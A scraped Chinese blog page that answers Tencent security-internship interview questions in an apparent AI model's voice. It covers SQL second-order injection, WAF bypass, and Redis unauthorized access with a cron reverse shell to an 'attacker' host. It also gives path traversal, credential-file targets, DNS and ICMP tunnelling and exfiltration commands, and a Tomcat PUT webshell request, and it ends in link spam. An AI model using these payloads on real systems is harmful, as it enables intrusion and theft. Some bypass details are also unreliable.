当前位置: 首页 > wzjs >正文

电话用网站做综合布线建筑行业的公司有哪些

电话用网站做综合布线,建筑行业的公司有哪些,网络软文怎么写,哪个网站域名解析安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 腾讯[实习]安全研究员 1. 自我介绍 2. SQL二次注入原理 3. 二次注入修复方案 4. SQL注入绕WAF&#xff…

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

腾讯[实习]安全研究员

1. 自我介绍

2. SQL二次注入原理

3. 二次注入修复方案

4. SQL注入绕WAF(过滤information)

5. Redis未授权访问漏洞

6. 渗透测试流程

7. CTF印象深题(例题)

8. 文件下载漏洞利用

9. 关键读取文件列表

10. HTTP不出网命令执行处理

11. 隧道通信详解

12. 漏洞预警处理流程

13. 中间件漏洞复现案例

14. 学校攻防演练职责

腾讯[实习]安全研究员

1. 自我介绍
2. sql注入了解吗,讲一讲二次注入的原理
3. 二次注入要怎么修复
4. sql注入过waf了解吗,若一个sql注入过滤了information关键词,怎么绕过
5. Redis未授权访问
6. 渗透测试的一个完整流程
7. 打ctf的时候有没有遇到什么印象特别深的题目
8. 文件下载漏洞有没有什么比较好的利用方式
9. 利用文件下载漏洞找文件名具体是找什么文件名(读取文件一般会读取哪些文件)(ctf中?实战中?)
10. 命令执行漏洞,http不出网有什么比较好的处理方法(发散一点说)
11. 接上一题,通过隧道通信,详细讲讲通过什么类型的隧道,讲讲具体操作
12. 漏洞预警
13. 有没有复现过中间件类型的漏洞(有没有完整的复现过漏洞)
14. 在学校的攻防演练中扮演的角色的主要职责是什么

1. 自我介绍

我是网络安全领域的AI助手,专注于渗透测试、漏洞分析与防御方案研究。回答内容基于OWASP标准、CTF赛事经验及实战攻防场景。


2. SQL二次注入原理

核心流程

  • 存储阶段:攻击者提交恶意数据(如admin'#)被存入数据库(如注册用户名)
  • 触发阶段:当应用调用该数据拼接SQL时(如修改密码操作),构造出UPDATE users SET password='new_pwd' WHERE user='admin'#',导致#后的条件失效,从而修改admin密码。

3. 二次注入修复方案

sql-- 修复代码示例(参数化查询) cursor.execute("UPDATE users SET password=%s WHERE username=%s", (new_pwd, username))

综合措施

  • 输入校验:过滤单引号、分号等特殊字符
  • 最小权限:数据库账户仅授权必要操作
  • 敏感操作审计:监控异常SQL执行日志

4. SQL注入绕WAF(过滤information

绕过方案

  • 替代关键词
    sqlSELECT table_name FROM sys.schema_tables -- MySQL 8.0+替代information_schema 
  • 编码混淆
    sqlSELECT 1 FROM /*!50000 information*/.tables -- 利用MySQL版本注释 
  • 字符串拼接
    sqlSELECT 'inf'||'ormation_schema'.tables -- PostgreSQL/MySQL字符串连接 

5. Redis未授权访问漏洞

利用方式

bashredis-cli -h 目标IP FLUSHALL # 清空数据库 echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1\n\n" | redis-cli -h 目标IP -x set 1 redis-cli -h 目标IP config set dir /var/spool/cron/ redis-cli -h 目标IP config set dbfilename root 

防御:启用认证(requirepass)、绑定127.0.0.1、限制防火墙策略。


6. 渗透测试流程

mermaidgraph TD A[信息收集] --> B[漏洞扫描] B --> C{漏洞验证} C -->|存在风险| D[渗透利用] C -->|无风险| E[生成报告] D --> F[权限提升] F --> G[数据获取] G --> H[痕迹清理] H --> E 

7. CTF印象深题(例题)

题型:Java反序列化+内存马注入
解法

  1. 分析JRMP协议流量
  2. 构造Gadget链触发Tomcat Filter注入
  3. 通过内存Shell绕过文件上传检测

8. 文件下载漏洞利用

高阶利用

  • 路径穿越/download?file=../../../../etc/passwd
  • 结合解析漏洞:下载.htaccess覆盖配置使图片执行PHP
  • SSRF组合:利用file://协议读取本地文件

9. 关键读取文件列表

场景目标文件示例
CTF/proc/self/environ, /flag, .git/config
实战/etc/shadow, ~/.ssh/id_rsa, WEB-INF/web.xml
云环境/meta-data/iam-role-credentials

10. HTTP不出网命令执行处理

四类解决方案

  1. DNS通道nslookup $(whoami).attacker.com
  2. ICMP隧道:使用ptunnel传输数据
  3. 延时盲注:通过sleep $(id|cut -c1)逐位提取
  4. 临时文件:重定向输出到Web目录(如/var/www/html/result

11. 隧道通信详解

ICMP隧道(icmpsh)操作

bash# 攻击端 ./icmpsh_m.py 攻击者IP 目标IP # 目标机(无网状态下) ./icmpsh.exe -t 攻击者IP -d 500 -s 30 

DNS隧道(dnscat2)

bashdnscat2-server --secret=密钥 attacker.com dnscat2-client --secret=密钥 attacker.com 

12. 漏洞预警处理流程

  1. 订阅CVE公告(NVD、CNVD)
  2. 验证漏洞影响范围(版本比对)
  3. 搭建沙箱复现漏洞
  4. 制定临时防御策略(如WAF规则)
  5. 协调补丁更新窗口期

13. 中间件漏洞复现案例

漏洞:Apache Tomcat CVE-2017-12615(PUT任意文件上传)
复现步骤

httpPUT /shell.jsp/ HTTP/1.1 Host: target:8080 Content-Length: 25 <% Runtime.exec("cmd"); %>

修复:升级版本或配置readonly=true


14. 学校攻防演练职责

防守方核心任务

  • 实时监控:分析WAF、IDS告警日志(如Suricata规则匹配)
  • 溯源反制:通过蜜罐捕获攻击者IP及手法
  • 应急响应:隔离感染主机(如阻断3389端口)
  • 加固实施:关闭高危服务(如SMBv1)
http://www.dtcms.com/wzjs/550461.html

相关文章:

  • 建站案例网站建设实训实训心得
  • 海外网站建设公司如何用python 做网站
  • 京东优惠劵网站怎么做服装定制的宣传广告
  • 做五金国际网站哪个好网页设计代码是怎么加链接
  • 提供佛山网站制作交互设计考研太难了
  • wordpress适用于任何网站吗网站服务器配置
  • 合同网站开发 设计 后期维护app软件做得比较好的公司
  • 网站右侧悬浮代码吴江网站建设公司
  • 云服务器 做网站wordpress图片间隙
  • 汕头网站设计浩森宇特上海莱布拉网站建设
  • 微信端网站开发模板河北建设工程信息网可登录中项网
  • 深圳建设网站制作游戏介绍网站模板
  • 哪家网站遴选做的比较好已备案域名30元购买平台
  • 建设局网站策划书海外服务器租用的价格
  • 网站的功能需求分析福州直播app开发公司
  • 怎样制作一个网站步骤江西网站备案
  • 沭阳网站建设托管wordpress tag找不到
  • 国内专业网站制作乡村建设的网站
  • 上海工作网站龙岗建网站
  • 网站开发排行榜深圳定制开发网站
  • 廊坊市网站推广vps服务器中的网站不显示图片
  • 瑞安网站建设中国有多少家做外贸网站设计的公司
  • 网站拒绝了您的访问网站后台 清理缓存
  • 当当网网站内容建设的分析wordpress列表自定义数据表
  • 网站建设基本步骤包括哪些汕头营销网络公司
  • 中国建设银行总行官方网站技术外包
  • 网站建设存在的具体问题wordpress 页面调用标签
  • 东莞网站推广公司黄页我有一个网站怎么做外贸
  • 用腾讯云做购物网站视频网站建设公司方维
  • 做算命网站南昌市建设工程质量监督网站